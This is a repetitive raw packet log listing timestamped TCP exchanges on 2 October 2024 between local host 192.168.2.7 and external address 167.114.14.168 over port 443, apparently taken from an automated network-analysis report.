                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236464977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236474991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236485958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236491919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236522913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236551046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237113953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237135887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237179995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237186909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237207890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237226009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237584114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237602949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237662077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237669945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.237709045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.328830004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.328855038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.328972101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.328998089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329047918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329206944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329225063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329283953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329292059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329319954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329336882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329776049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329794884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329852104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329855919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329869986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329889059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329915047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329929113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329947948 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.329972029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330507040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330527067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330584049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330591917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330632925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330647945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330665112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330717087 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330724001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.330759048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331520081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331542015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331592083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331602097 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331617117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331643105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.331680059 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.421896935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.421921015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422039032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422072887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422120094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422359943 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422377110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422437906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422446966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.422485113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427371979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427407980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427458048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427475929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427490950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427516937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427767038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427788973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427844048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427851915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.427913904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428268909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428287029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428344011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428353071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428390980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428507090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428520918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428581953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428589106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428628922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428776026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428792000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428874969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428881884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.428920984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429079056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429095030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429148912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429157972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429168940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.429193020 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526170015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526194096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526325941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526350975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526400089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526659012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526676893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526731014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526737928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.526777029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533381939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533401966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533476114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533493996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533538103 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533921957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.533940077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534003973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534013033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534053087 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534425020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534440041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534509897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534518957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534559965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.534996033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535012007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535078049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535085917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535123110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535691023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535706043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535770893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535779953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.535818100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.536225080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.536242962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.536303043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.536310911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.536349058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.616885900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.616910934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.616952896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.616971970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.616986990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617007017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617244959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617268085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617296934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617305994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617330074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.617346048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623588085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623615980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623677015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623692989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623733997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623851061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623868942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623908043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623915911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.623965025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624298096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624317884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624360085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624366999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624387980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624404907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624813080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624831915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624883890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624891043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.624929905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625344038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625361919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625401974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625408888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625430107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625447989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625674963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625700951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625736952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625742912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625766039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.625782013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707355022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707381964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707427979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707448959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707462072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707488060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707746029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707763910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707808018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707815886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.707849026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714018106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714039087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714077950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714090109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714102983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714126110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714528084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714545012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714622974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714622974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714631081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714665890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714963913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.714981079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715015888 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715023041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715045929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715060949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715424061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715442896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715480089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715487003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715507984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715523958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715881109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715897083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715945959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715954065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.715997934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716353893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716371059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716406107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716413021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716433048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.716450930 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.797867060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.797892094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798022985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798053026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798094988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798270941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798291922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798343897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798352003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.798389912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.804678917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.804699898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.804761887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.804775000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.804810047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805107117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805123091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805182934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805190086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805224895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805562019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805581093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805634975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805641890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.805675030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806109905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806128025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806170940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806178093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806202888 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806221008 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806390047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806405067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806454897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.806463003 CEST44349713167.114.14.168192.168.2.7
